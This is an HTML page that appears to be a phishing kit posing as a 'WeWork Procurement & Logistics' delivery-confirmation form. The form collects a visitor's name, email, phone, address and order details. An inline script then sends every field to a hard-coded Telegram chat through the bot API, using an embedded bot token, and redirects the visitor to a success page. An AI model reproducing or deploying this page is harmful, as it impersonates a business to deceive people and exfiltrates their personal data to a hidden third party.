<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Delivery Confirmation - WeWork Procurement</title>
    
    <!-- CSS Link -->
    <link rel="stylesheet" href="style.css">

    <!-- Google Fonts & Font Awesome (Optional) -->
    <link href="https://fonts.googleapis.com/css2?family=Open+Sans&family=Roboto&display=swap" rel="stylesheet">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0/css/all.min.css">
</head>
<body>

    <header class="main-header">
        <div class="container">
            <h1>WeWork Procurement & Logistics</h1>
            <nav>
                <ul>
                    <li><a href="index.html">Home</a></li>
                    <li><a href="about.html">About Us</a></li>
                    <li><a href="services.html">Services</a></li>
                    <li><a href="confirm.html" class="active">Confirm Delivery</a></li>
                </ul>
            </nav>
        </div>
    </header>

    <section class="page-header">
        <div class="container">
            <h2>Delivery Confirmation</h2>
            <p>Please complete the form below to verify your delivery.</p>
        </div>
    </section>

    <section class="confirmation-form">
        <div class="container">
            <form id="confirmForm">
                <div class="form-group">
                    <label for="fullName">Full Name</label>
                    <input type="text" id="fullName" name="fullName" required>
                </div>

                <div class="form-group">
                    <label for="email">Email Address</label>
                    <input type="email" id="email" name="email" required>
                </div>

                <div class="form-group">
                    <label for="phone">Phone Number</label>
                    <input type="tel" id="phone" name="phone" required>
                </div>

                <div class="form-group">
                    <label for="deliveryAddress">Delivery Address</label>
                    <textarea id="deliveryAddress" name="deliveryAddress" rows="3" required></textarea>
                </div>

                <div class="form-group">
                    <label for="productName">Product Name or Description</label>
                    <input type="text" id="productName" name="productName" required>
                </div>

                <div class="form-group">
                    <label for="orderID">Order ID (Optional)</label>
                    <input type="text" id="orderID" name="orderID">
                </div>

                <div class="form-group">
                    <button type="submit" class="cta-button">Confirm My Delivery</button>
                </div>
            </form>
        </div>
    </section>

    <footer class="main-footer">
        <div class="container">
            <p>&copy; 2025 WeWork Procurement & Logistics. All rights reserved.</p>
        </div>
    </footer>

    <!-- Telegram Form Script -->
    <script>
        document.getElementById("confirmForm").addEventListener("submit", function(e) {
            e.preventDefault();

            const fullName = document.getElementById("fullName").value;
            const email = document.getElementById("email").value;
            const phone = document.getElementById("phone").value;
            const deliveryAddress = document.getElementById("deliveryAddress").value;
            const productName = document.getElementById("productName").value;
            const orderID = document.getElementById("orderID").value || "N/A";

            const message = `
🚚 *NEW DELIVERY CONFIRMATION* 📦

👤 Full Name: ${fullName}
📧 Email: ${email}
📞 Phone: ${phone}
🏠 Address: ${deliveryAddress}
📦 Product: ${productName}
🆔 Order ID: ${orderID}
`;

            const token = "7813235070:AAGEOAio5gWtoiNZz9MF-dzictp7vZ4erWA"; // Your bot token
            const chat_id = "7175428395"; // Your Telegram chat ID

            fetch(`https://api.telegram.org/bot${token}/sendMessage`, {
                method: "POST",
                headers: {
                    "Content-Type": "application/json"
                },
                body: JSON.stringify({
                    chat_id: chat_id,
                    text: message,
                    parse_mode: "Markdown"
                })
            })
            .then(response => {
                if (response.ok) {
                    window.location.href = "success.html";
                } else {
                    alert("Failed to send. Try again.");
                }
            })
            .catch(error => {
                alert("Error sending form. Please check your internet.");
                console.error("Telegram error:", error);
            });
        });
    </script>
</body>
</html>
